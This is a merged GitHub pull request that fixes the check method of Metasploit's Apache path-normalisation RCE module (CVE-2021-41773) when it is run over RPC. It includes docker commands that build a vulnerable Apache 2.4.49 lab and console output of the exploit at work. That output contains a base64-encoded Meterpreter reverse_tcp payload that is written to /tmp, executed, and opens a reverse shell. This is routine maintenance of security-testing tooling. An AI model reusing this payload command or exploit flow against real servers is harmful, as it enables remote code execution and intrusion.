Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Fix apache_normalize_path_rce check method #19152

Merged
1 commit merged into from
May 1, 2024
Merged

Fix apache_normalize_path_rce check method #19152

1 commit merged into from
May 1, 2024

Conversation

adfoster-r7
Copy link
Contributor

Fixes a bug in apache_normalize_path_rce's check method via the RPC interface

Verification

Set up a target for RCE

metasploit-framework/documentation/modules/auxiliary/scanner/http/apache_normalize_path.md

Lines 24 to 30 in 2dce738

```
docker run -dit --name CVE-2021-41773 -p 8080:80 -v /opt/apache2.4.49:/usr/local/apache2/htdocs httpd:2.4.49
docker exec -it CVE-2021-41773 sed -i "0,/denied/s/AllowOverride none/# AllowOverride None/" conf/httpd.conf
docker exec -it CVE-2021-41773 sed -i "0,/denied/s/denied/granted/" conf/httpd.conf
docker stop CVE-2021-41773
docker start CVE-2021-41773
```

  • Ensure the module works via Metasploit console:
msf6 exploit(multi/http/apache_normalize_path_rce) > rerun rhost=192.168.123.1 lhost=192.168.123.1 rport=8080 ssl=false cve=CVE-2021-41773 
[*] Reloading module...

[*] Started reverse TCP handler on 192.168.123.1:4444 
[*] Using auxiliary/scanner/http/apache_normalize_path as check
[+] http://192.168.123.1:8080 - The target is vulnerable to CVE-2021-41773 (mod_cgi is enabled).
[*] Scanned 1 of 1 hosts (100% complete)
[*] http://192.168.123.1:8080 - Attempt to exploit for CVE-2021-41773
[*] http://192.168.123.1:8080 - Sending linux/x64/meterpreter/reverse_tcp command payload
[*] http://192.168.123.1:8080 - Generated command payload: echo f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAeABAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAEAAOAABAAAAAAAAAAEAAAAHAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAA+gAAAAAAAAB8AQAAAAAAAAAQAAAAAAAAMf9qCViZthBIidZNMclqIkFaagdaDwVIhcB4UWoKQVlQailYmWoCX2oBXg8FSIXAeDtIl0i5AgARXMCoewFRSInmahBaaipYDwVZSIXAeSVJ/8l0GFdqI1hqAGoFSInnSDH2DwVZWV9IhcB5x2o8WGoBXw8FXmp+Wg8FSIXAeO3/5g== | base64 -d > /tmp/SzoTkiR; chmod +x /tmp/SzoTkiR; /tmp/SzoTkiR; rm -f /tmp/SzoTkiR
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 192.168.123.1
[*] Meterpreter session 12 opened (192.168.123.1:4444 -> 192.168.123.1:49301) at 2024-05-01 20:06:43 +0100

Ensure the module works via RPC (i.e. Metasploit Pro)

image

Before

Check method failed, because the CHECK_RCE method wasn't defaulted correctly for the CheckModule method to work

image

After

Session opened

image

adfoster-r7
adfoster-r7 commented May 1, 2024
View reviewed changes
modules/exploits/multi/http/apache_normalize_path_rce.rb
@@ -88,6 +87,12 @@ def initialize(info = {})
])
end

def check_options
Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Wired up via

metasploit-framework/lib/msf/core/exploit/remote/check_module.rb

Line 52 in 2dce738

'Options' => datastore.merge(check_options),

@smcintyre-r7 smcintyre-r7 self-assigned this May 1, 2024
@smcintyre-r7 smcintyre-r7 added module bug rn-fix release notes fix labels May 1, 2024
@smcintyre-r7 smcintyre-r7 closed this pull request by merging all changes into rapid7:master in 1bf721b May 1, 2024
@smcintyre-r7
Copy link
Contributor

Release Notes

This fixes an issue in the exploit/multi/http/apache_normalize_path_rce exploit module that affected Metasploit Pro due to how the module was handling datastore options.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees

@smcintyre-r7 smcintyre-r7

Labels
bug module rn-fix release notes fix
Projects
Metasploit Kanban
Archived in project
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
2 participants
@adfoster-r7 @smcintyre-r7